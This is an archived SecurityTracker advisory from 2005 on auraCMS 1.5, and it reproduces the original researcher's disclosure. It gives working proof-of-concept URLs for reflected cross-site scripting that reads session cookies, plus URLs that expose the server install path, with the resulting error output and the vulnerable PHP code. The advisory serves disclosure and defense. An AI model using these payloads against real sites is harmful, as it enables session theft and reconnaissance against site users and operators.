SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   auraCMS Vendors:   auracms.opensource-indonesia.com
auraCMS Discloses Path to Remote Users and Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1013357
SecurityTracker URL:  http://securitytracker.com/id/1013357
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 2 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 1.5
Description:   Several vulnerabilities were reported in auraCMS. A remote user can conduct cross-site scripting attacks. A remote user can determine the installation path.

The software does not properly validate user-supplied input in various parameters. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the auraCMS software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/[aura]/hits.php?&hits=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/[aura]/index.php?query=%3Cscript%3Ealert(document.cookie)%3C/script%3E&pilih=search

http://[target]/[aura]/counter.php?theCount=%3Cscript%3Ealert(document.cookie)%3C/script%3E

A remote user can also supply the following type of URL to determine the installation path:

http://[target]/[aura]/?pilih=teman&id=34%60select%20all

http://[target]/[aura]/?pilih=hal&id=4%60tes

http://[target]/[aura]/?pilih=arsip&topik=1%60

The vendor was notified on February 15, 2005.

y3dips reported this vulnerability.

The original advisory is available at:

http://echo.or.id/adv/adv011-y3dips-2005.txt

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the auraCMS software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can determine the installation path.

Solution:   No solution was available at the time of this entry.
Vendor URL:  auracms.opensource-indonesia.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Vulnerabilities in Aura CMS




---------------------------------------------------------------------------
                     Vulnerabilities in Aura CMS
---------------------------------------------------------------------------

Author: y3dips
Date: Januari, 25th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv011-y3dips-2005.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

auraCMS (Content Management System)

version: 1.5
date   : 21 September 2004
lisensi: GPL - http://www.gnu.org/licenses/licenses.html#GPL

Author: Arif Supriyanto - arif@ayo.kliksini.com
        http://www.semarang.tk
	  http://www.ayo.kliksini.com
	  http://www.auracms.opensource-indonesia.com

Description:

auraCMS is a PHP script package that you to possiblity to building
a website with dynamic content easier and faster, no waste time more.


---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full Path disclosures

==>> http://[site]/[aura]/?pilih=teman&id=34%60select%20all

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
 /home/cxxo/public_html/aura/teman.php on line 9

==>> http://[site]/[aura]/?pilih=hal&id=4%60tes

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in 
 /home/cxxo/public_html/aura/hal.php on line 10


==>> http://[site]/[aura]/?pilih=arsip&topik=1%60

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in  
/home/cxxo/public_html/aura/arsip.php on line 11

B. Session ID

CMS with This version has two method of authentication (session and cookies) ,
this problem has found in session method .

There are so many variable that havent declared yet, it makes attacker could
exploit it by inputing some "character" n gaining an session id on windows pop up


for eXample

---- hits.php -----

<?
$perintah = "SELECT * FROM counter WHERE id=1";
$hasil = mysql_query( $perintah );
while ($data = mysql_fetch_row($hasil)) {
	$hits=$data[3];
}

echo "<b>$hits</b>";

?>

-------end -------

look $hits variable , do you see something interested ? yes SIR , we've found something
lets do some try


==>> http://[site]/[aura]/hits.php?&hits=%3Cscript%3Ealert(document.cookie)%3C/script%3E

then you get the session ID

another vulnerable :

in pencarian (search) input box

 + http://[site]/[aura]/index.php?query=%3Cscript%3Ealert(document.cookie)%3C/script%3E&pilih=search

also in counter module

 + http://[site]/[aura]/counter.php?theCount=%3Cscript%3Ealert(document.cookie)%3C/script%3E



p.s : Wanna know what session IDs gives you ? try google :D

---------------------------------------------------------------------------

FIx :

founded : Januari 25th 2005
reported to vendor :Februari 15th  2005
                    ;vendor respond but not yet releasing any patch
publish at securityfocus : March 2th 2005



---------------------------------------------------------------------------

Shoutz:
~~~~~~~

~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ newbie_hacker@yahoogroups.com ,http://forum.ehco.or.id
~ #e-c-h-o@DALNET

---------------------------------------------------------------------------
Contact:
~~~~~~~~

     y3dips || echo|staff || y3dips[at]gmail[dot]com
     Homepage: http://y3dips.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC